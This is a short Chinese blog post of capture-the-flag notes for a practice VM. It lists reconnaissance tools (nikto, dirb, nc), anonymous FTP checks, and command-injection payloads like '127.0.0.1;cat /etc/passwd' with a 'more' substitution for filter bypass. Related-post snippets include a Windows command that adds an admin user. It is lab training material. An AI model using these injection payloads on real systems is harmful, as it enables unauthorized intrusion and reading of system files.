靶场夺旗

最新推荐文章于 2024-06-13 08:34:49 发布
最新推荐文章于 2024-06-13 08:34:49 发布
阅读量546 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/101364297
版权

这次虚拟机不能直接用vmbox导入,给的是硬盘文件,要新建虚拟机,然后选择使用现有的硬盘,不需要操作系统,硬盘里包括了,虚拟机选择linux ubuntu版本,只能在vmbox里新建,不能再vmware里新建,我也不知道为什么,试了好几次都不行。

扫描所有端口号

探测所有信息

探测敏感信息

nikto -host http://靶场ip地址:端口(80端口可省略)

dirb http://靶场ip地址:端口

大端口非http服务,可用nc 探测该端口Banner信息

nc ip地址 端口

大端口http服务,可用浏览器浏览界面查看源代码,寻找flag

http://ip:端口

ftp匿名登陆

ftp://ip 匿名登陆ftp服务器根目录,查看敏感文件,一定要查看源代码

robots.txt文件

命令执行时,为了绕过对应限制,可用相似命令来代替限制的shell命令

127.0.0.1;id

127.0.0.1;cat /etc/passwd

 

cat用more代替

127.0.0.1;more /etc/passwd

RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

ssh -p port 用户名@ip

pwd ls cat more 执行命令查看flag

用more 来代替cat 

^BonnenuIt
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ChainFlag靶场实战(一)
m0_68764244的博客
01-02 683
靶场wpmore。
CTF练习:靶场夺旗
qq_43233085的博客
11-23 5776
CTF练习:靶场夺旗环境准备信息收集ssh登录靶机 靶机地址: 链接:https://pan.baidu.com/s/1bi2wi7tEuegoXPSdpqJWzQ 提取码:532d 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172.19.75.100 ping一下,测试连...
pikachu靶场(命令执行(RCE)通关教程)
最新发布
记录学习
06-13 217
pikachu靶场之RCE通关教程
我的CTF学习与教学之旅笔记:靶场夺旗
lm19770429的专栏
11-06 413
靶场夺旗详细步骤及个人思考
5-1靶场夺旗
高冷的宅先生
04-01 423
1.信息探测 #扫描主机开放的端口号 nmap -p- -T4 192.168.2.115 #快速扫描主机全部信息(会遗漏端口开放情况) nmap -T4 -A -v 192.168.2.115 #探测敏感信息 nikto -host http://192.168.2.115:80(9090) dirb http://192.168.2.115:80(9090) 2.深入挖掘 #分析nmap、n...
CTF-8 靶场夺旗
猎荒者
02-23 2133
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) CTF-8 虚拟机 NAT 网络连接 1. 主机发现 fping -asg 10.10.16.0/24 访问靶机 http://10.10.16.138 查看源代码,发现 flag 2. 端口扫描 nmap -A -v -s...
DC_4 靶场夺旗
猎荒者
02-22 384
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) DC_4 虚拟机 NAT 网络连接 1. 主机发现 方法一:fping -asg 10.10.16.0/24 方法二:nmap -sP 10.10.16.0/24 2. 端口扫描 nmap -A -v -sS -sV -p- ...
网络安全夺旗5个flag靶机详细实操教程
06-14
【网络安全夺旗5个flag靶机详细实操教程】是一篇针对网络安全初学者的实践教程,旨在通过实际操作,帮助学习者掌握网络安全攻防的基本技能。教程覆盖了环境搭建、靶机扫描、漏洞利用和权限提升等多个环节。 首先,...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
开源靶场zsbdzsbd
04-19
【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目,其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中,你可以找到各种模拟真实网络环境中存在的漏洞,通过实战...
webgoat靶场需要自行搭建
01-19
WebGoat是一个知名的在线安全靶场,主要用于网络安全教育和练习,尤其在Web应用程序安全领域具有重要地位。这个项目由OWASP(开放网络应用安全项目)维护,旨在帮助开发者、安全人员以及学生理解和学习常见的Web应用...
Rick and Morty HD Wallpapers Cartoon Theme-crx插件
03-16
享受您最喜欢的卡通节目-瑞克和莫蒂的高清背景。 您是里克和莫蒂的粉丝吗? 如果您愿意的话,多亏它的死忠粉丝,请不要犹豫安装此扩展程序并享受自己喜欢的卡通节目的高清背景。 您打开的每个新标签页都会得到不同的图像。 在评论中告诉我们,哪个字符是您的最爱。 更多功能:-日期/时间-天气预报-Gmail收件箱-Google Calendar Sync-屏幕保护程序模式-快速拨号此扩展名更改您的默认搜索。 隐私政策:https://coolstart.com/privacy-policy使用条款:https://coolstart.com/terms-of-use如何卸载:https://coolstart.com/how-to-uninstall 支持语言:English
Lazysysadmin 靶场.zip
12-22
Lazysysadmin 靶场.zip
5-1靶场夺旗实战
高冷的宅先生
03-31 359
1.前言 由于5-1课程是个阶段性的课程,所以还是结合前几节课的知识点,先行对靶机进行了探测,记录一下并总结经验 2.行为记录 #查看靶机的IP地址 netdiscover ------------------------------------- #扫描靶机开放的服务,实际上这种探测漏掉了部分开放端口,直接导致后面走不通了 nmap -A -v 192.168.2.115 nikto -host...
【记一次DC4靶场夺旗过程】
qq_55213436的博客
07-04 1554
目录前言 夺旗过程总结 最近也是学了一些提权方面的知识,所以找个靶场来练练手。以下针对vulnerable发布的dc4靶场来进行一个简单的渗透测试。
DC_3 靶机夺旗
猎荒者
02-20 322
兵无常势,水无常形,能因敌而致胜者,谓之神 1. 环境准备 VMware Workstation Pro12 Kali Linux DC-VM-3 虚拟机 NAT 网络 2. 靶机渗透 2.1 信息收集 2.1.1 主机发现 2.1.2 端口扫描 2.1.3 目录爆破 2.2 漏洞挖掘 2.3 漏洞利用 2.4 Getshell 提权 3. 总结 ...
关于vulnhub靶场获取flag基本流程和方法
qq_54030686的博客
11-14 2464
关于vulnhub靶场获取flag基本流程和方法 将目标虚拟机和kali(个人主机)使用桥接或者nat模式连接到同一个C段下 1.发现 使用nmap,netdiscover进行主机发现,找到你的目标主机(192.168.0.1/24,192.168…0.1-255) nmap 参数 -sn 不扫描端口,只ping主机 -PE 通过ICMP echo判定主机是否存活 2.端口探测 使用nmap 进行扫描 使用-p 65535 进行全端口扫描 –A综合扫描 -O 系统扫描 端口容易出现的问题 21
CTF夺旗训练课程
热门推荐
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
长城初级靶场
qq_52986156的博客
10-14 556
net user admin admin@123 /add :此处用户名admin 密码admin@123 /add添加用户(已有用户会当做更改用户名比如administrator)net user 查看所有用户 net user test1 /active:yes (no)激活/禁用用户。其他常规参数--dbs --tables --columns 爆库爆表爆字段 --dump 显示打印。主要通过御剑后台和7kbscan扫描,搜集了后台信息页面。
kali2021.3安装DVWA靶场教程
"kali2021.3安装dvwa靶场" 在本文中,我们将详细探讨如何在Kali Linux 2021.3版本上安装DVWA(Damn Vulnerable Web Application)靶场,这对于初学者进行Web渗透测试是非常有帮助的。DVWA是一个开源的、易受攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值